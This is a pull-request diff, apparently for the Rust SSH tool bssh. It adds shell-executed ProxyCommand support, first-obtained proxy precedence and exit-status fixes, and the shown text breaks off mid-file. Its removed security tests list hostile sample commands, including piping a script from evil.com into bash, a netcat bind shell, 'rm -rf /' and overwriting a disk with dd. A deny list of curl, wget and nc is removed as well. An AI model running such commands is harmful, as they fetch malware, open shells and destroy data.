### PR TITLE
fix: execute ProxyCommand transport

### DIFF
--- a/README.md
+++ b/README.md
@@ -874,11 +874,12 @@ These options control SSH proxy connection behavior:
 
 | Option | Description | Example |
 |--------|-------------|---------|
-| **ProxyUseFdpass** | Pass connected file descriptor from ProxyCommand to ssh(1) instead of continuing execution (yes/no, default: no, OpenSSH 6.5+) | `ProxyUseFdpass yes` |
+| **ProxyCommand** | Run a shell command whose stdin/stdout carry the SSH transport; supports `%%`, `%h`, `%k`, `%n`, `%p`, and `%r` | `ProxyCommand nc %h %p` |
+| **ProxyUseFdpass** | Request descriptor passing from ProxyCommand (recognized but not supported by bssh) | `ProxyUseFdpass no` |
 
-**ProxyUseFdpass** optimizes ProxyCommand usage by eliminating an unnecessary lingering process and reducing I/O overhead. When enabled, the proxy command passes the established connection file descriptor directly to ssh and exits, rather than remaining active to relay data throughout the session. This is particularly useful with proxy commands like netcat that support file descriptor passing (nc -F).
+**ProxyCommand** uses the user's shell so OpenSSH-style quoting, redirection, and pipelines work. `ProxyCommand none` explicitly selects a direct connection. `ProxyCommand` and `ProxyJump` follow OpenSSH's first-obtained ssh_config rule, while command-line `-J` takes precedence over both.
 
-*Note: This option is currently parsed from SSH configuration files for compatibility but is not yet utilized in bssh's SSH client implementation, as proxy connections are not yet supported.*
+*Note: `ProxyUseFdpass yes` is rejected with an actionable error before the command starts. Use a streaming ProxyCommand without `-F`, or set `ProxyUseFdpass no`.*
 
 ### Command Execution and Automation Options
 
@@ -1007,20 +1008,13 @@ Host *.secure.prod.example.com
 #### Proxy Connection Optimization
 
 ```ssh-config
-# Optimized proxy connection with file descriptor passing
+# HTTP CONNECT proxy
 Host internal-server
-    ProxyCommand nc -X connect -x proxy.example.com:1080 -F %h %p
-    ProxyUseFdpass yes
+    ProxyCommand nc -X connect -x proxy.example.com:1080 %h %p
 
-# SOCKS proxy with netcat (reduces overhead)
+# SOCKS proxy with netcat
 Host *.internal.example.com
-    ProxyCommand nc -x socks.example.com:1080 -F %h %p
-    ProxyUseFdpass yes
-
-# Jump host with ProxyCommand and fd passing
-Host bastion-optimized
-    ProxyCommand ssh -W %h:%p jump.example.com
-    ProxyUseFdpass yes
+    ProxyCommand nc -x socks.example.com:1080 %h %p
 ```
 
 #### Command Execution and Automation

--- a/docs/man/bssh.1
+++ b/docs/man/bssh.1
@@ -639,27 +639,30 @@ Example:
 
 .SS Proxy Options
 .TP
-.B ProxyUseFdpass
-Specifies that ProxyCommand will pass a connected file descriptor back to ssh(1)
-instead of continuing to execute and relay data.
-This reduces overhead by avoiding an unnecessary lingering process and extra I/O operations.
-When enabled, the proxy command establishes a connection, passes the file descriptor
-to ssh via the fdpass mechanism, and exits. The ssh process then communicates directly
-with the connection, eliminating the intermediate proxy process.
+.B ProxyCommand
+Executes a local command whose standard input and output carry the SSH transport.
+The command is run by the user's shell, preserving OpenSSH-style quoting,
+redirection, and pipelines.
 .br
-Default is no.
+Supported tokens are %%, %h, %k, %n, %p, and %r.
 .br
-Introduced in OpenSSH 6.5 (January 2014).
-.br
-This is particularly useful with proxy commands like netcat that support file descriptor
-passing via the -F option (nc.openbsd).
+.I ProxyCommand none
+explicitly selects a direct connection. When ProxyCommand and ProxyJump both
+appear in ssh_config, the first obtained value is used; command-line -J takes
+precedence over both.
 .br
 Example:
-.I ProxyUseFdpass yes
+.I ProxyCommand nc %h %p
+
+.TP
+.B ProxyUseFdpass
+Requests that ProxyCommand pass a connected file descriptor instead of relaying
+the SSH transport over standard input and output.
 .br
-Note: This option is currently parsed from SSH configuration files for compatibility
-but is not yet utilized in bssh's SSH client implementation, as proxy connections
-are not yet supported.
+Default is no. bssh does not support descriptor passing and rejects
+.I ProxyUseFdpass yes
+with an actionable error before starting the proxy command. Use a streaming
+ProxyCommand without netcat's -F option instead.
 
 .SS Command Execution and Automation Options
 .TP
@@ -1048,15 +1051,13 @@ Host *.secure.prod.example.com
     PermitRemoteOpen localhost:8080
     PermitRemoteOpen db.internal:5432
 
-# Optimized proxy connection with file descriptor passing
+# HTTP CONNECT proxy
 Host internal-server
-    ProxyCommand nc -X connect -x proxy.example.com:1080 -F %h %p
-    ProxyUseFdpass yes
+    ProxyCommand nc -X connect -x proxy.example.com:1080 %h %p
 
-# SOCKS proxy with netcat (reduces overhead)
+# SOCKS proxy with netcat
 Host *.internal.example.com
-    ProxyCommand nc -x socks.example.com:1080 -F %h %p
-    ProxyUseFdpass yes
+    ProxyCommand nc -x socks.example.com:1080 %h %p
 
 # Development server with automatic file sync
 Host dev-server

--- a/src/app/dispatcher.rs
+++ b/src/app/dispatcher.rs
@@ -62,6 +62,8 @@ fn build_ssh_connection_config_resolver(
         .with_yaml_keepalive_max(ctx.config.get_server_alive_count_max(cluster_name))
         .with_cli_address_family(AddressFamily::from_flags(cli.ipv4, cli.ipv6))
         .with_cli_host_key_alias(cli.get_ssh_option("HostKeyAlias"))
+        .with_cli_proxy_jump(cli.jump_hosts.clone())
+        .with_yaml_proxy_jump(ctx.config.get_cluster_jump_host(cluster_name))
 }
 
 /// Decide whether `-S` (sudo-password) is meaningful for the given dispatch path.

--- a/src/app/initialization.rs
+++ b/src/app/initialization.rs
@@ -424,15 +424,15 @@ Host example.com
     #[test]
     fn test_determine_effective_jump_hosts_wildcard_pattern() {
         let ssh_config_content = r#"
-Host *.internal
-    ProxyJump gateway.company.com
-
 Host db.internal
     ProxyJump db-gateway.company.com
+
+Host *.internal
+    ProxyJump gateway.company.com
 "#;
         let ssh_config = SshConfig::parse(ssh_config_content).unwrap();
 
-        // Should match the most specific pattern
+        // OpenSSH uses the first value obtained, so put the exact host first.
         let result = determine_effective_jump_hosts(None, &ssh_config, "db.internal");
         assert_eq!(result, Some("db-gateway.company.com".to_string()));
 

--- a/src/app/nodes.rs
+++ b/src/app/nodes.rs
@@ -75,11 +75,10 @@ pub fn parse_node_with_ssh_config(node_str: &str, ssh_config: &SshConfig) -> Res
     };
     let effective_port = ssh_config.get_effective_port(raw_host, cli_port);
 
-    Ok(Node::new(
-        effective_hostname,
-        effective_port,
-        effective_user,
-    ))
+    Ok(
+        Node::new(effective_hostname, effective_port, effective_user)
+            .with_original_host(validated_host),
+    )
 }
 
 #[cfg(test)]
@@ -212,7 +211,8 @@ pub async fn resolve_nodes(
         let effective_port =
             ssh_config.get_effective_port(host, port.or_else(|| cli.get_effective_port()));
 
-        let node = Node::new(effective_hostname, effective_port, effective_user);
+        let node = Node::new(effective_hostname, effective_port, effective_user)
+            .with_original_host(host.to_string());
         nodes.push(node);
     } else if let Some(hosts) = &cli.hosts {
         // Parse hosts from CLI with hostlist expression expansion

--- a/src/commands/download.rs
+++ b/src/commands/download.rs
@@ -104,7 +104,7 @@ pub async fn download_file(
             let node_dir = validated_destination.join(node.to_string());
             let ssh_connection_config = params
                 .ssh_connection_config_resolver
-                .resolve_for_host(&node.host);
+                .resolve_for_host(node.config_host());
 
             println!(
                 "\n{} {} {} {} {:?}",

--- a/src/commands/exec.rs
+++ b/src/commands/exec.rs
@@ -106,7 +106,7 @@ async fn execute_command_with_forwarding(params: ExecuteCommandParams<'_>) -> Re
     // listener side was already constrained when the spec was parsed.
     let ssh_connection_config = params
         .ssh_connection_config_resolver
-        .resolve_for_host(&node.host);
+        .resolve_for_host(node.config_host());
     let forwarding_config = ForwardingConfig {
         address_family: ssh_connection_config.address_family,
         ..ForwardingConfig::default()

--- a/src/executor/connection_manager.rs
+++ b/src/executor/connection_manager.rs
@@ -415,15 +415,15 @@ Host internal.example.com
     #[test]
     fn test_resolve_effective_jump_hosts_wildcard() {
         let ssh_config_content = r#"
-Host *.internal.example.com
-    ProxyJump gateway.example.com
-
 Host db.internal.example.com
     ProxyJump db-gateway.example.com
+
+Host *.internal.example.com
+    ProxyJump gateway.example.com
 "#;
         let ssh_config = SshConfig::parse(ssh_config_content).unwrap();
 
-        // Should match db.internal.example.com specifically
+        // OpenSSH uses the first value obtained, so put the exact host first.
         let result =
             resolve_effective_jump_hosts(None, Some(&ssh_config), "db.internal.example.com");
         assert_eq!(result, Some("db-gateway.example.com".to_string()));
@@ -452,15 +452,15 @@ Host *.internal.example.com
     #[test]
     fn test_resolve_effective_jump_hosts_none_value() {
         let ssh_config_content = r#"
-Host *.example.com
-    ProxyJump gateway.example.com
-
 Host direct.example.com
     ProxyJump none
+
+Host *.example.com
+    ProxyJump gateway.example.com
 "#;
         let ssh_config = SshConfig::parse(ssh_config_content).unwrap();
 
-        // direct.example.com should have ProxyJump explicitly set to "none"
+        // The explicit disable must be obtained before the wildcard fallback.
         // Note: The actual handling of "none" as special value would be
         // done by the connection layer, but the config should return it
         let result = resolve_effective_jump_hosts(None, Some(&ssh_config), "direct.example.com");

--- a/src/executor/parallel.rs
+++ b/src/executor/parallel.rs
@@ -26,7 +26,9 @@ use crate::node::Node;
 use crate::security::{Password, SudoPassword};
 use crate::ssh::SshConfig;
 use crate::ssh::known_hosts::StrictHostKeyChecking;
-use crate::ssh::tokio_client::{AddressFamily, SshConnectionConfig, SshConnectionConfigResolver};
+use crate::ssh::tokio_client::{
+    AddressFamily, CommandOutput, SshConnectionConfig, SshConnectionConfigResolver,
+};
 
 use super::connection_manager::{ExecutionConfig, download_from_node};
 use super::execution_strategy::{
@@ -60,6 +62,39 @@ pub struct ParallelExecutor {
     pub(crate) ssh_config: Option<SshConfig>,
     /// Per-host SSH connection configuration resolver.
     pub(crate) ssh_connection_config_resolver: SshConnectionConfigResolver,
+}
+
+async fn report_stream_exit_status(
+    sender: &tokio::sync::mpsc::Sender<CommandOutput>,
+    result: &Result<u32>,
+) {
+    if let Ok(exit_status) = result {
+        let _ = sender.send(CommandOutput::ExitCode(*exit_status)).await;
+    }
+}
+
+fn completed_stream_result(
+    stream: &super::stream_manager::NodeStream,
+) -> Result<crate::ssh::client::CommandResult> {
+    if let Some(exit_status) = stream.exit_code() {
+        return Ok(crate::ssh::client::CommandResult {
+            host: stream.node.host.clone(),
+            output: Vec::new(),
+            stderr: Vec::new(),
+            exit_status,
+        });
+    }
+
+    if let super::stream_manager::ExecutionStatus::Failed(error) = stream.status() {
+        return Err(anyhow::anyhow!("{error}"));
+    }
+
+    Ok(crate::ssh::client::CommandResult {
+        host: stream.node.host.clone(),
+        output: Vec::new(),
+        stderr: Vec::new(),
+        exit_status: 1,
+    })
 }
 
 impl ParallelExecutor {
@@ -283,7 +318,7 @@ impl ParallelExecutor {
 
     pub(crate) fn connection_config_for_node(&self, node: &Node) -> SshConnectionConfig {
         self.ssh_connection_config_resolver
-            .resolve_for_host(&node.host)
+            .resolve_for_host(node.config_host())
     }
 
     /// Execute a command on all nodes in parallel.
@@ -1300,6 +1335,7 @@ impl ParallelExecutor {
                     }
                 };
 
+                report_stream_exit_status(&tx, &result.1).await;
                 // Explicitly drop the channel to signal completion
                 drop(tx);
                 result
@@ -1504,19 +1540,7 @@ impl ParallelExecutor {
         }
         // Collect final results from all streams
         for stream in manager.streams() {
-            use crate::ssh::client::CommandResult;
-
-            let result =
-                if let super::stream_manager::ExecutionStatus::Failed(err) = stream.status() {
-                    Err(anyhow::anyhow!("{err}"))
-                } else {
-                    Ok(CommandResult {
-                        host: stream.node.host.clone(),
-                        output: Vec::new(), // stdout already printed
-                        stderr: Vec::new(), // stderr already printed
-                        exit_status: stream.exit_code().unwrap_or(1),
-                    })
-                };
+            let result = completed_stream_result(stream);
 
             results.push(ExecutionResult {
                 node: stream.node.clone(),
@@ -1851,6 +1875,63 @@ impl ParallelExecutor {
 mod tests {
     use super::*;
     use crate::ssh::SshConfig;
+
+    async fn assert_stream_exit_follows_output(exit_status: u32) {
+        let (sender, mut receiver) = tokio::sync::mpsc::channel(3);
+        sender
+            .send(CommandOutput::StdOut(bytes::Bytes::from_static(b"stdout")))
+            .await
+            .expect("stdout receiver open");
+        sender
+            .send(CommandOutput::StdErr(bytes::Bytes::from_static(b"stderr")))
+            .await
+            .expect("stderr receiver open");
+
+        let result = Ok(exit_status);
+        report_stream_exit_status(&sender, &result).await;
+        drop(sender);
+
+        match receiver.recv().await {
+            Some(CommandOutput::StdOut(data)) => assert_eq!(data, b"stdout"[..]),
+            other => panic!("stdout must be first, got {other:?}"),
+        }
+        match receiver.recv().await {
+            Some(CommandOutput::StdErr(data)) => assert_eq!(data, b"stderr"[..]),
+            other => panic!("stderr must be second, got {other:?}"),
+        }
+        match receiver.recv().await {
+            Some(CommandOutput::ExitCode(actual)) => assert_eq!(actual, exit_status),
+            other => panic!("exit status must follow output, got {other:?}"),
+        }
+        assert!(receiver.recv().await.is_none());
+    }
+
+    #[tokio::test]
+    async fn successful_stream_exit_follows_stdout_and_stderr() {
+        assert_stream_exit_follows_output(0).await;
+    }
+
+    #[tokio::test]
+    async fn nonzero_stream_exit_follows_stdout_and_stderr() {
+        assert_stream_exit_follows_output(23).await;
+    }
+
+    #[tokio::test]
+    async fn nonzero_stream_completion_preserves_remote_status() {
+        let node = Node::new("target".to_string(), 22, "user".to_string());
+        let (sender, receiver) = tokio::sync::mpsc::channel(1);
+        let mut stream = super::super::stream_manager::NodeStream::new(node, receiver);
+        sender
+            .send(CommandOutput::ExitCode(23))
+            .await
+            .expect("exit receiver open");
+        drop(sender);
+        stream.poll();
+
+        let result = completed_stream_result(&stream).expect("remote command result");
+
+        assert_eq!(result.exit_status, 23);
+    }
 
     #[test]
     fn connection_config_for_node_resolves_each_node_host_block() {

--- a/src/node.rs
+++ b/src/node.rs
@@ -75,17 +75,32 @@ pub fn parse_node_spec(node_str: &str) -> Result<NodeSpec<'_>> {
 #[derive(Debug, Clone, PartialEq)]
 pub struct Node {
     pub host: String,
+    /// Host name as supplied before ssh_config `HostName` expansion.
+    pub original_host: String,
     pub port: u16,
     pub username: String,
 }
 
 impl Node {
     pub fn new(host: String, port: u16, username: String) -> Self {
+        let original_host = host.clone();
         Self {
             host,
+            original_host,
             port,
             username,
         }
+    }
+
+    #[must_use]
+    pub fn with_original_host(mut self, original_host: String) -> Self {
+        self.original_host = original_host;
+        self
+    }
+
+    /// Host name used to match ssh_config and expand ProxyCommand `%n`.
+    pub fn config_host(&self) -> &str {
+        &self.original_host
     }
 
     pub fn parse(node_str: &str, default_user: Option<&str>) -> Result<Self> {
@@ -110,6 +125,7 @@ impl Node {
 
         Ok(Node {
             host: spec.host.to_string(),
+            original_host: spec.host.to_string(),
             port: spec.port.unwrap_or(22),
             username,
         })

--- a/src/ssh/client/connection.rs
+++ b/src/ssh/client/connection.rs
@@ -17,7 +17,7 @@ use crate::jump::{JumpHostChain, parse_jump_hosts};
 use crate::security::Password;
 use crate::ssh::known_hosts::StrictHostKeyChecking;
 use crate::ssh::tokio_client::{
-    AuthMethod, Client, SshConnectionConfig, SshConnectionConfigResolver,
+    AuthMethod, Client, ProxyMode, SshConnectionConfig, SshConnectionConfigResolver,
 };
 use anyhow::{Context, Result};
 use std::path::Path;
@@ -285,6 +285,13 @@ impl SshClient {
         ssh_connection_config_resolver: Option<&SshConnectionConfigResolver>,
         pre_collected_password: Option<Arc<Password>>,
     ) -> Result<Client> {
+        let jump_hosts_spec =
+            match ssh_connection_config.and_then(|config| config.proxy_mode.as_ref()) {
+                Some(ProxyMode::Jump(jump)) => Some(jump.as_str()),
+                Some(ProxyMode::Command(_) | ProxyMode::Direct) => None,
+                None => jump_hosts_spec,
+            };
+
         if let Some(jump_spec) = jump_hosts_spec {
             // Parse jump hosts
             let jump_hosts = parse_jump_hosts(jump_spec).with_context(|| {

--- a/src/ssh/ssh_config/parser/core.rs
+++ b/src/ssh/ssh_config/parser/core.rs
@@ -241,15 +241,14 @@ pub(super) fn parse_config_line(
     // Determine if using equals syntax
     let eq_pos = line.find('=');
     let uses_equals_syntax = if let Some(pos) = eq_pos {
-        // Has equals sign - extract first word to check
-        let prefix = &line[..pos];
-        let first_word = prefix
-            .split_whitespace()
-            .next()
-            .unwrap_or("")
-            .to_lowercase();
+        // Only an equals sign immediately following the option name selects
+        // Option=Value syntax. Values such as `ProxyCommand env FOO=bar`
+        // must stay in the ordinary whitespace-separated form.
+        let key_candidate = line[..pos].trim();
+        let equals_follows_option =
+            !key_candidate.is_empty() && !key_candidate.chars().any(char::is_whitespace);
         // Host and Match never use equals syntax
-        !matches!(first_word.as_str(), "host" | "match")
+        equals_follows_option && !matches!(key_candidate.to_lowercase().as_str(), "host" | "match")
     } else {
         false
     };

--- a/src/ssh/ssh_config/parser/options/mod.rs
+++ b/src/ssh/ssh_config/parser/options/mod.rs
@@ -149,6 +149,7 @@ pub fn parse_option(
         | "fallbacktorsh"
         | "globalknownhostsfile2"
         | "rhostsauthentication"
+        | "securitykeyprovider"
         | "userknownhostsfile2"
         | "useroaming"
         | "usersh"

--- a/src/ssh/ssh_config/parser/options/proxy.rs
+++ b/src/ssh/ssh_config/parser/options/proxy.rs
@@ -34,22 +34,28 @@ pub(super) fn parse_proxy_option(
             if args.is_empty() {
                 anyhow::bail!("ProxyJump requires a value at line {line_number}");
             }
-            host.proxy_jump = Some(args.join(" "));
+            if host.proxy_jump.is_none() && host.proxy_command.is_none() {
+                host.proxy_jump = Some(args.join(" "));
+            }
         }
         "proxycommand" => {
             if args.is_empty() {
                 anyhow::bail!("ProxyCommand requires a value at line {line_number}");
             }
-            let command = args.join(" ");
-            validate_executable_string(&command, "ProxyCommand", line_number)?;
-            host.proxy_command = Some(command);
+            if host.proxy_jump.is_none() && host.proxy_command.is_none() {
+                let command = args.join(" ");
+                validate_executable_string(&command, "ProxyCommand", line_number)?;
+                host.proxy_command = Some(command);
+            }
         }
         "proxyusefdpass" => {
             if args.is_empty() {
                 anyhow::bail!("ProxyUseFdpass requires a value at line {line_number}");
             }
             let value = parse_yes_no(&args[0], line_number)?;
-            host.proxy_use_fdpass = Some(value);
+            if host.proxy_use_fdpass.is_none() {
+                host.proxy_use_fdpass = Some(value);
+            }
         }
         _ => unreachable!("Unexpected keyword in parse_proxy_option: {}", keyword),
     }

--- a/src/ssh/ssh_config/parser/tests.rs
+++ b/src/ssh/ssh_config/parser/tests.rs
@@ -138,6 +138,22 @@ Host example.com
 }
 
 #[test]
+fn equals_in_url_value_is_preserved_by_config_line_parser() {
+    let line = r#"KnownHostsCommand curl -s "https://api.example.com/keys?host=%H&format=ssh""#;
+    let (keyword, args) = parse_config_line(line, 1, 4096).unwrap();
+
+    assert_eq!(keyword, "knownhostscommand");
+    assert_eq!(
+        args,
+        vec![
+            "curl",
+            "-s",
+            r#""https://api.example.com/keys?host=%H&format=ssh""#
+        ]
+    );
+}
+
+#[test]
 fn test_parse_mixed_syntax() {
     // Test mixing both syntaxes in same config
     let content = r#"

--- a/src/ssh/ssh_config/parser/tests.rs
+++ b/src/ssh/ssh_config/parser/tests.rs
@@ -124,6 +124,20 @@ Host example.com
 }
 
 #[test]
+fn test_equals_in_proxy_command_value_is_not_option_syntax() {
+    let content = r#"
+Host example.com
+    ProxyCommand env SSH_SK_HELPER="/tmp/ssh-sk-helper" nc %h %p
+"#;
+    let hosts = parse(content).unwrap();
+
+    assert_eq!(
+        hosts[0].proxy_command,
+        Some("env SSH_SK_HELPER=\"/tmp/ssh-sk-helper\" nc %h %p".to_string())
+    );
+}
+
+#[test]
 fn test_parse_mixed_syntax() {
     // Test mixing both syntaxes in same config
     let content = r#"

--- a/src/ssh/ssh_config/resolver.rs
+++ b/src/ssh/ssh_config/resolver.rs
@@ -105,13 +105,17 @@ pub(super) fn merge_host_config(base: &mut SshHostConfig, overlay: &SshHostConfi
         base.identity_files
             .extend(overlay.identity_files.iter().cloned());
     }
-    if overlay.proxy_jump.is_some() {
-        base.proxy_jump = overlay.proxy_jump.clone();
+    // OpenSSH keeps the first obtained proxy directive. ProxyCommand and
+    // ProxyJump compete for the same slot, so either one suppresses all later
+    // occurrences of both directives.
+    if base.proxy_jump.is_none() && base.proxy_command.is_none() {
+        if overlay.proxy_jump.is_some() {
+            base.proxy_jump = overlay.proxy_jump.clone();
+        } else if overlay.proxy_command.is_some() {
+            base.proxy_command = overlay.proxy_command.clone();
+        }
     }
-    if overlay.proxy_command.is_some() {
-        base.proxy_command = overlay.proxy_command.clone();
-    }
-    if overlay.proxy_use_fdpass.is_some() {
+    if base.proxy_use_fdpass.is_none() && overlay.proxy_use_fdpass.is_some() {
         base.proxy_use_fdpass = overlay.proxy_use_fdpass;
     }
     if overlay.strict_host_key_checking.is_some() {

--- a/src/ssh/ssh_config/resolver_tests.rs
+++ b/src/ssh/ssh_config/resolver_tests.rs
@@ -331,8 +331,8 @@ Host example.com
     }
 
     #[test]
-    fn test_proxy_use_fdpass_merging() {
-        // Test that ProxyUseFdpass properly merges across multiple host blocks
+    fn test_proxy_settings_keep_first_obtained_values() {
+        // OpenSSH keeps the first value obtained across matching host blocks.
         let content = r#"
 Host *
     ProxyCommand ssh -W %h:%p bastion1.example.com
@@ -345,12 +345,12 @@ Host example.com
         let hosts = parse(content).unwrap();
         let config = find_host_config(&hosts, "example.com");
 
-        // The more specific block should override both ProxyCommand and ProxyUseFdpass
+        // The global block matched first, so the later block cannot override it.
         assert_eq!(
             config.proxy_command,
-            Some("ssh -W %h:%p bastion2.example.com".to_string())
+            Some("ssh -W %h:%p bastion1.example.com".to_string())
         );
-        assert_eq!(config.proxy_use_fdpass, Some(true));
+        assert_eq!(config.proxy_use_fdpass, Some(false));
     }
 
     #[test]

--- a/src/ssh/ssh_config/security/string_validation.rs
+++ b/src/ssh/ssh_config/security/string_validation.rs
@@ -34,6 +34,9 @@ pub fn validate_executable_string(
     option_name: &str,
     line_number: usize,
 ) -> Result<()> {
+    if option_name == "ProxyCommand" {
+        return validate_proxy_command(value, line_number);
+    }
     // Define dangerous shell metacharacters that could enable command injection
     const DANGEROUS_CHARS: &[char] = &[
         ';',  // Command separator
@@ -70,11 +73,6 @@ pub fn validate_executable_string(
     // Additional validation for ControlPath - it should be a path, not a command
     if option_name == "ControlPath" {
         validate_control_path_specific(value, line_number)?;
-    }
-
-    // Additional validation for ProxyCommand
-    if option_name == "ProxyCommand" {
-        validate_proxy_command(value, line_number)?;
     }
 
     // Additional validation for KnownHostsCommand and LocalCommand
@@ -163,45 +161,33 @@ fn validate_control_path_specific(value: &str, line_number: usize) -> Result<()>
 
 /// Additional validation for ProxyCommand
 fn validate_proxy_command(value: &str, line_number: usize) -> Result<()> {
-    // ProxyCommand "none" is a special case to disable proxy
-    if value == "none" {
-        return Ok(());
-    }
-
-    // Check for suspicious executable names or patterns
+    // ProxyCommand is deliberately interpreted by a shell, just as OpenSSH
+    // does. The ssh_config file is the trust boundary, so shell operators and
+    // standard proxy tools such as nc must remain available. Validate only
+    // structural hazards and the percent-token contract here.
     let trimmed = value.trim();
-
-    // Look for common injection patterns
-    if trimmed.starts_with("bash ")
-        || trimmed.starts_with("sh ")
-        || trimmed.starts_with("/bin/")
-        || trimmed.starts_with("python ")
-        || trimmed.starts_with("perl ")
-        || trimmed.starts_with("ruby ")
-    {
-        // These could be legitimate but are commonly used in attacks
-        tracing::warn!(
-            "ProxyCommand at line {} uses potentially risky executable '{}'. \
-             Ensure this is intentional and from a trusted source.",
-            line_number,
-            trimmed.split_whitespace().next().unwrap_or("")
+    if trimmed.is_empty() {
+        anyhow::bail!("ProxyCommand requires a non-empty value at line {line_number}");
+    }
+    if let Some(invalid) = value.chars().find(|ch| matches!(ch, '\0' | '\n' | '\r')) {
+        anyhow::bail!(
+            "ProxyCommand contains invalid control character {invalid:?} at line {line_number}"
         );
     }
 
-    // Block obviously malicious patterns
-    let lower_value = value.to_lowercase();
-    if lower_value.contains("curl ")
-        || lower_value.contains("wget ")
-        || lower_value.contains("nc ")
-        || lower_value.contains("netcat ")
-        || lower_value.contains("rm ")
-        || lower_value.contains("dd ")
-        || lower_value.contains("cat /")
-    {
-        anyhow::bail!(
-            "Security violation: ProxyCommand contains suspicious command pattern at line {line_number}. \
-             Commands like curl, wget, nc, rm, dd are not typical for SSH proxying."
-        );
+    let mut chars = value.chars();
+    while let Some(ch) = chars.next() {
+        if ch != '%' {
+            continue;
+        }
+        let Some(token) = chars.next() else {
+            anyhow::bail!("ProxyCommand ends with an incomplete '%' token at line {line_number}");
+        };
+        if !matches!(token, '%' | 'h' | 'k' | 'n' | 'p' | 'r') {
+            anyhow::bail!(
+                "ProxyCommand contains unsupported token '%{token}' at line {line_number}; supported tokens are %%, %h, %k, %n, %p, and %r"
+            );
+        }
     }
 
     Ok(())

--- a/src/ssh/ssh_config/security/tests.rs
+++ b/src/ssh/ssh_config/security/tests.rs
@@ -33,32 +33,26 @@ fn test_validate_executable_string_legitimate() {
 }
 
 #[test]
-fn test_validate_executable_string_malicious() {
-    // Test malicious commands that should be blocked
-    let malicious_commands = vec![
-        "ssh -W %h:%p gateway.example.com; rm -rf /",
-        "ssh -W %h:%p gateway.example.com | bash",
-        "ssh -W %h:%p gateway.example.com & curl evil.com",
-        "ssh -W %h:%p `whoami`",
-        "ssh -W %h:%p $(whoami)",
-        "curl http://evil.com/malware.sh | bash",
-        "wget -O - http://evil.com/script | sh",
-        "nc -l 4444 -e /bin/sh",
-        "rm -rf /important/files",
-        "dd if=/dev/zero of=/dev/sda",
-    ];
-
-    for cmd in malicious_commands {
-        let result = validate_executable_string(cmd, "ProxyCommand", 1);
+fn test_proxy_command_allows_openssh_shell_syntax() {
+    for command in [
+        "nc proxy.example.com 22 | cat",
+        "exec ssh -W %h:%p gateway.example.com",
+        "sh -c 'connect %h %p'",
+        "printf data > /tmp/proxy-input && cat /tmp/proxy-input",
+    ] {
         assert!(
-            result.is_err(),
-            "Malicious command should be blocked: {cmd}"
+            validate_executable_string(command, "ProxyCommand", 1).is_ok(),
+            "OpenSSH-compatible shell command should pass: {command}"
         );
+    }
+}
 
-        let error = result.unwrap_err().to_string();
+#[test]
+fn test_proxy_command_rejects_invalid_structure() {
+    for command in ["echo %x", "echo %", "echo\0bad", "echo\nbad"] {
         assert!(
-            error.contains("Security violation"),
-            "Error should mention security violation for: {cmd}. Got: {error}"
+            validate_executable_string(command, "ProxyCommand", 1).is_err(),
+            "structurally invalid command should fail: {command:?}"
         );
     }
 }

--- a/src/ssh/ssh_config/types.rs
+++ b/src/ssh/ssh_config/types.rs
@@ -41,8 +41,7 @@ pub struct SshHostConfig {
     pub proxy_jump: Option<String>,
     pub proxy_command: Option<String>,
     /// ProxyUseFdpass option - specifies whether ProxyCommand will pass a file descriptor
-    /// Note: This option is parsed from SSH config but not yet used in the actual SSH
-    /// client implementation as bssh doesn't currently support proxy connections.
+    /// The client rejects `yes` explicitly because descriptor passing is unsupported.
     pub proxy_use_fdpass: Option<bool>,
     pub strict_host_key_checking: Option<String>,
     /// Raw `UserKnownHostsFile` values in OpenSSH lookup order.

--- a/src/ssh/tokio_client/channel_manager.rs
+++ b/src/ssh/tokio_client/channel_manager.rs
@@ -63,6 +63,30 @@ const MAX_SUDO_PROMPT_BUFFER_SIZE: usize = 64 * 1024;
 /// Set to 10 to support reasonable multi-sudo command chains.
 const MAX_SUDO_PASSWORD_SENDS: u32 = 10;
 
+/// Forward one command event without making receiver lifetime part of the SSH result.
+///
+/// A pager or pipeline such as `head` may close its read end before the remote
+/// command reports an exit status. Continue draining the SSH channel in that
+/// case so a local consumer decision is not misreported as a command failure.
+async fn forward_command_output(sender: &Sender<CommandOutput>, output: CommandOutput) -> bool {
+    match sender.try_send(output) {
+        Ok(()) => true,
+        Err(tokio::sync::mpsc::error::TrySendError::Full(output)) => {
+            tracing::trace!("Output channel full, applying backpressure");
+            if sender.send(output).await.is_ok() {
+                true
+            } else {
+                tracing::debug!("Output receiver dropped; continuing to drain SSH channel");
+                false
+            }
+        }
+        Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) => {
+            tracing::debug!("Output receiver dropped; continuing to drain SSH channel");
+            false
+        }
+    }
+}
+
 #[derive(Debug, Clone, PartialEq, Eq)]
 struct DirectTcpipRequestTarget {
     host: String,
@@ -307,6 +331,7 @@ impl Client {
         channel.exec(true, sanitized_command.as_str()).await?;
 
         let mut result: Option<u32> = None;
+        let mut output_receiver_open = true;
 
         // While the channel has messages...
         while let Some(msg) = channel.wait().await {
@@ -314,44 +339,17 @@ impl Client {
                 // If we get data, send it to the streaming channel
                 // Note: We must clone the data here because russh owns it and will reuse the buffer
                 russh::ChannelMsg::Data { ref data } => {
-                    // Try non-blocking send first for better performance
-                    match sender.try_send(CommandOutput::StdOut(data.clone())) {
-                        Ok(_) => {}
-                        Err(tokio::sync::mpsc::error::TrySendError::Full(output)) => {
-                            // Channel is full - apply backpressure by waiting
-                            // This prevents memory exhaustion on high-throughput commands
-                            tracing::trace!("Channel full, applying backpressure for stdout");
-                            if sender.send(output).await.is_err() {
-                                // Receiver dropped - stop processing
-                                tracing::debug!("Receiver dropped, stopping stdout processing");
-                                break;
-                            }
-                        }
-                        Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) => {
-                            // Receiver dropped - stop processing
-                            tracing::debug!("Channel closed, stopping stdout processing");
-                            break;
-                        }
+                    if output_receiver_open {
+                        output_receiver_open =
+                            forward_command_output(&sender, CommandOutput::StdOut(data.clone()))
+                                .await;
                     }
                 }
                 russh::ChannelMsg::ExtendedData { ref data, ext: 1 } => {
-                    // Handle backpressure for stderr as well
-                    match sender.try_send(CommandOutput::StdErr(data.clone())) {
-                        Ok(_) => {}
-                        Err(tokio::sync::mpsc::error::TrySendError::Full(output)) => {
-                            // Channel is full - apply backpressure by waiting
-                            tracing::trace!("Channel full, applying backpressure for stderr");
-                            if sender.send(output).await.is_err() {
-                                // Receiver dropped - stop processing
-                                tracing::debug!("Receiver dropped, stopping stderr processing");
-                                break;
-                            }
-                        }
-                        Err(tokio::sync::mpsc::error::TrySendError::Closed(_)) => {
-                            // Receiver dropped - stop processing
